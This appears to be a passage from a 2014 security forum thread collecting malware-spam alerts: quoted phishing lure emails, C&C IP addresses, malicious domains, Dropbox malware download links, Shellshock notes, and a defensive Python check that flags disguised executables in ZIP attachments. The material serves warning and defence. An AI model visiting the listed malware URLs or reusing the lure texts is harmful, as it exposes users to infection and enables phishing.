    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Invoice SPAM - XLS malware
    - http://myonlinesecurity.co.uk/invoic...e-xls-malware/
    29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

    29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
    Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/a...is/1411980639/
    ... Behavioural information
    TCP connections
    82.165.38.206: https://www.virustotal.com/en/ip-add...6/information/
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Bank SPAM - leads to malware
    - http://blog.dynamoo.com/2014/09/malw...cial-bank.html
    29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From: Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date: 29 September 2014 11:03
    Subject: Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

    HSBC Bank UK "Payment Advice Issued"
    From: HSBC Bank UK
    Date: 29 September 2014 11:42
    Subject: Payment Advice Issued
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
    Please download your payment advice at ...


    The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
    * https://www.virustotal.com/en-gb/fil...e28b/analysis/
    ... Behavioural information
    DNS requests
    cuscorock .com (184.154.253.181)
    formatech .es (81.88.48.71)
    TCP connections
    184.154.253.181: https://www.virustotal.com/en/ip-add...1/information/
    81.88.48.71: https://www.virustotal.com/en/ip-add...1/information/
    188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
    ___

    Fake Order SPAM
    - http://myonlinesecurity.co.uk/order-...61864-malware/
    29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
    - Order statsus: Order confirmation: 9618161864
    - Order info: 32257958734
    - Payment status: 93612666937
    - Payment info: 21714421631
    - Payment confirmation: 27863161481
    The email looks like ( slightly different versions all with different names and phone numbers and companies):
    Greetings,
    Your order #9618161864 will be shipped on 01.10.2014.
    Date: September 29, 2014. 12:12pm
    Price: £156.77
    Transaction number: 9AECB76F37D22F21
    Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
    Kind regards,
    Sales Department
    Tiana Haggin ...


    Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
    Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/2...is/1411991708/
    ... Behavioural information
    TCP connections
    213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
    23.62.99.24: https://www.virustotal.com/en/ip-add...4/information/
    213.186.33.4: https://www.virustotal.com/en/ip-add...4/information/
    ___

    More Fake Voicemail SPAM - fake wav malware
    - http://myonlinesecurity.co.uk/new-vo...e-wav-malware/
    29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


    ... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
    29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
    Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1412003182/
    ___

    'Mailbox Has Exceeded The Storage Limit' - Phish ...
    - https://blog.malwarebytes.org/fraud-...e-limit-phish/
    Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


    The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
    ___

    Bash Bug vulnerability
    - http://www.symantec.com/connect/blog...-vulnerability
    Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
    How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
    > http://www.symantec.com/connect/site...m-600px_v2.png
    ... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

    Table of C&C Servers:
    - http://blog.trendmicro.com/trendlabs...9/Table-01.jpg

    89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
    108.162.197.26: https://www.virustotal.com/en/ip-add...6/information/
    162.253.66.76: https://www.virustotal.com/en/ip-add...6/information/
    213.5.67.223: https://www.virustotal.com/en/ip-add...3/information/

    Last edited by AplusWebMaster; 2014-09-29 at 22:19.

  7. #537
    AplusWebMaster (Adviser Team)

    Fake NatWest, new FAX, Delta Air SPAM

    FYI...

    Fake NatWest, new FAX SPAM
    - http://blog.dynamoo.com/2014/09/malw...-have-new.html
    30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From: NatWest [secure.message@ natwest .com]
    Date: 30 September 2014 09:58
    Subject: You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

    "You've received a new fax"
    From: Fax [fax@victimdomain .com]
    Date: 30 September 2014 09:57
    Subject: You've received a new fax
    New fax at SCAN4148711 from EPSON by https ://victimdomain .com
    Scan date: Tue, 30 Sep 2014 14:27:24 +0530
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...


    The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
    * https://www.virustotal.com/en/file/1...is/1412070442/
    ... Behavioural information
    DNS requests
    maazmedia .com (69.89.22.130)
    TCP connections
    188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
    69.89.22.130: https://www.virustotal.com/en/ip-add...0/information/
    ___

    Fake Delta Air SPAM - word doc malware
    - http://myonlinesecurity.co.uk/delta-...d-doc-malware/
    30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


    30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
    Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/3...is/1412075964/

    Last edited by AplusWebMaster; 2014-09-30 at 15:51.

  8. #538
    AplusWebMaster (Adviser Team)

    Fake Police 'Suspect', Invoice SPAM

    FYI...

    Fake Police 'Suspect' SPAM
    - http://blog.dynamoo.com/2014/10/homi...tant-spam.html
    1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
    From: ALERT@ police .uk [ALERT@ police-uk .com]
    Date: 1 October 2014 08:49
    Subject: Homicide Suspect - important
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-49627
    Bulletin Author: BARILLAS #1264
    Sending User #: 56521
    APBnet Version:
    The bulletin is a pdf file. To download please follow the link below ...


    Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
    * https://www.virustotal.com/en/file/5...is/1412150049/

    ** https://anubis.iseclab.org/?action=r...da&format=html
    ___

    Something evil on 87.118.127.230
    - http://blog.dynamoo.com/2014/10/some...118127230.html
    1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

    87.118.127.230: https://www.virustotal.com/en/ip-add...0/information/
    ___

    Fake 'Booking Cancellation' SPAM
    - http://blog.dynamoo.com/2014/10/ukts...cellation.html
    1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
    From: email@ uktservices .com
    Date: 1 October 2014 14:01
    Subject: Booking Cancellation
    Hello.
    Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
    Here is a link to your updated bookings view...


    All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

    37.235.56.121: https://www.virustotal.com/en/ip-add...1/information/
    ___

    More Fake Invoice SPAM
    - http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
    1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...ital_email.png

    There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently. Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on your antivirus to protect you from these types of malware.
    Today's Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/6...is/1412153387/
    ___

    Fake 'Cashbuild Copied invoices' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/cashbu...e-pdf-malware/
    1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

    get copies of invoices. We will not be able to pay them. Please send clear invoices

    1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
    Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/8...is/1412156828/
    ___

    GNU bash vulns...
    - http://www.securitytracker.com/id/1030890
    Updated: Oct 3 2014*
    Original Entry Date: Sep 24 2014
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6271 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6277 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6278 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7169 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7186 - 10.0 (HIGH)
    - https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7187 - 10.0 (HIGH)
    * ... archive entries have one or more follow-up message(s)...
    ___

    DoubleClick abused - malvertising
    - https://blog.malwarebytes.org/malver...ising-attacks/
    30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
    > https://blog.malwarebytes.org/wp-con...9/overview.png
    ... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
    * https://blog.malwarebytes.org/malver...lick-and-zedo/

    ** https://blog.malwarebytes.org/exploi...ael-newspaper/

    *** https://www.virustotal.com/en/file/5...is/1412048718/

    Last edited by AplusWebMaster; 2014-10-04 at 20:55.
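Nearly every lure in the posts above follows the same pattern: a ZIP attachment whose member is an executable (`.exe`, `.scr`, `.pif`) carrying a document icon and, often, a double extension such as `_pdf.exe` or `.xls.exe`, so that a Windows box with "hide extensions for known file types" enabled shows it as a PDF or spreadsheet. The following mail-gateway style check is an added example written for this thread, not code from myonlinesecurity.co.uk, dynamoo or the thread author: it inspects a ZIP attachment in memory, without extracting anything, and flags members whose final extension is executable, calling out the disguised double-extension case separately. The extension lists are a hypothetical policy, and the sample ZIP, its member names and its placeholder contents are constructed for the example.

```python
import io
import posixpath
import zipfile
from typing import List, Optional, Tuple

# Extensions Windows runs on double-click (hypothetical policy list; extend
# as needed). .pif is included because the thread notes a .pif disguised as
# a PDF in the "photos from the insurance company" run.
EXEC_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "jse",
            "wsf", "hta", "msi", "jar", "lnk"}
# Document types the lures pretend to be.
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "png", "txt"}


def attachment_risk(filename: str) -> Optional[str]:
    """Return a reason string if filename is an executable lure, else None."""
    # Normalise Windows separators, drop directories, compare case-insensitively.
    parts = posixpath.basename(filename.replace("\\", "/")).lower().split(".")
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext not in EXEC_EXT:
        return None
    # "invoice.pdf.exe": the part before the real extension is a document type.
    if len(parts) >= 3 and parts[-2] in DOC_EXT:
        return f"executable .{ext} disguised as .{parts[-2]}"
    return f"executable attachment (.{ext})"


def zip_member_risks(data: bytes) -> List[Tuple[str, str]]:
    """Inspect a ZIP attachment in memory; members are never written to disk."""
    risks = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            reason = attachment_risk(name)
            if reason:
                risks.append((name, reason))
    return risks


def build_sample_zip() -> bytes:
    """Constructed sample: member names modelled on the thread's lures,
    contents are placeholder bytes, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_12345.pdf.exe", b"placeholder")
        zf.writestr("VoiceMail.scr", b"placeholder")
        zf.writestr("readme.txt", b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in zip_member_risks(build_sample_zip()):
        print(f"{name}: {reason}")
```

The check deliberately keys on the last extension only, since that is what Windows uses to decide whether to execute the file; the icon embedded in the executable is what fools the user, not the name. On the endpoint side, the "show known file extensions" setting the posts refer to corresponds to Explorer's `HideFileExt` value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced` (0 shows extensions), which can be set by policy rather than left to each user.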

  9. #539
    AplusWebMaster (Adviser Team)

    Fake invoice, lawyer SPAM

    FYI...

    Fake Invoice SPAM - XLS malware
    - http://myonlinesecurity.co.uk/invoic...e-xls-malware/
    2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...107587_815.png

    This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    ___

    Fake lawyer SPAM - PDF malware
    - http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
    document from lawyer
    resend the fax
    document’s from lawyer
    document review
    notarized document from lawyer


    The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
    2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
    Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1412241170/
    ___

    Fake 'Shipping' SPAM - .scr malware
    - http://myonlinesecurity.co.uk/po-948...pping-malware/
    2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
    Hi April,
    PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
    UPS Tracking Number: 1ZY79R600397981039
    Thank you and have a wonderful afternoon.
    Amy Fling
    Pro Shoe Covers
    503-807-1642
    800-978-1786
    www. ProShoeCovers .com
    129 Pendleton Way, #31
    Washougal, WA 98671
    OMWBE Certified
    Women’s Business Enterprise ...


    The html version looks like:
    April,
    Please see attached draw. Thanks
    Leta Potts
    Conquest Electrical Contracting, LLC
    Owner/Operator
    12307 Roxie Drive, Ste. 215
    Austin, TX 78729
    Cell 925 487-5121
    Office 925 524-2651 ...


    2 October 2014: docs100214.zip - Extracts to: mydocs.scr
    Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like an icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/f...is/1412253608/

    - http://www.ehow.com/info_8510148_scr-file.html
    "... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
    ___

    Fake insurance photos SPAM - malware
    - http://myonlinesecurity.co.uk/fwd-ph...mpany-malware/
    2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names and email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file (Windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    ___

    Fake 'eDocument' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/santan...e-pdf-malware/
    2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con..._statement.png

    ... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * http://myonlinesecurity.co.uk/docume...e-pdf-malware/
    ___

    O/S Market Share - Sep 2014:
    - http://www.netmarketshare.com/operat...10&qpcustomd=0
    ['Still more XP users than Vista, Win8, and Win8.1 combined']
    ___

    Fake invoice SPAM
    - http://blog.mxlab.eu/2014/10/02/fake...ntains-trojan/
    2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
    Unpaid invoice notification
    The first campaign has the following details:
    [IMPORTANT] Unpaid invoice notification
    [IMPORTANT] Latest letter on invoice overdue
    Final letter before commencing legal action
    Latest invoice
    Latest letter on invoice overdue
    Recent invoice


    This email is sent from spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
    We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
    Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
    If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
    This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
    You can find the original invoice in attachment below...


    The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
    * https://www.virustotal.com/en/file/e...is/1412243475/

    The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
    This email contains an invoice ID:P198150_874 file attachment.
    Yours faithfully,
    Harrison Andrews , Department CCD


    The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
    ** https://www.virustotal.com/en/file/3...cefa/analysis/

    Last edited by AplusWebMaster; 2014-10-02 at 22:30.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #540
    Adviser Team AplusWebMaster
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Adobe, Personal reply, Transactions Report, Dropbox malSPAM

    FYI...

    Fake 'Transactions Report' SPAM - fake PDF malware
    - http://myonlinesecurity.co.uk/alert-...e-pdf-malware/
    3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:

    Your requested report is attached here...

    3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
    Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
    This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/e...is/1412331282/
    ___

    Fake 'shopping' malSPAM spreads via Dropbox
    - http://blog.dynamoo.com/2014/10/than...-us-today.html
    3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
    From: pghaa@ pghaa .org
    To: victim@ victimdomain .com
    Date: 3 October 2014 11:43
    Subject: victim@ victimdomain .com
    Thanks for shopping with us today! Your purchase will be processed shortly.
    ORDER DETAILS
    Purchase Number: CTV188614791
    Purchase Date: 7:38 2-Oct-2014
    Customer Email: victim@ victimdomain .com
    Amount: 4580 US Dollars
    Open your payment details
    Please click the link provided above to get more details about your order...


    In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
    UPDATE: it is also being distributed via
    [donotclick]
    https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
    https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
    * https://www.virustotal.com/en-gb/fil...is/1412334793/
    ___

    Fake 'Personal reply' SPAM - Word doc malware
    - http://myonlinesecurity.co.uk/re-per...d-doc-malware/
    3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...fice_macro.png

    3 October 2014: Reply02.doc . Current Virus total detections: 4/55*
    Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
    * https://www.virustotal.com/en/file/7...is/1412314059/
    ___

    Fake 'Adobe invoice' SPAM...
    - http://blog.mxlab.eu/2014/10/02/mali...rvice-invoice/
    Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is sent from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
    Dear Customer,
    Thank you for signing up for Adobe Creative Cloud Service.
    Attached is your copy of the invoice.
    Thank you for your purchase.
    Thank you,
    The Adobe Team
    Adobe Creative Cloud Service


    Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif

    The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
    * https://www.virustotal.com/en/file/5...f3f5/analysis/
    ___

    Shellshock in-the-wild - drops malware
    - http://community.websense.com/blogs/...erability.aspx
    1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
    Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
    - A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
    - A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
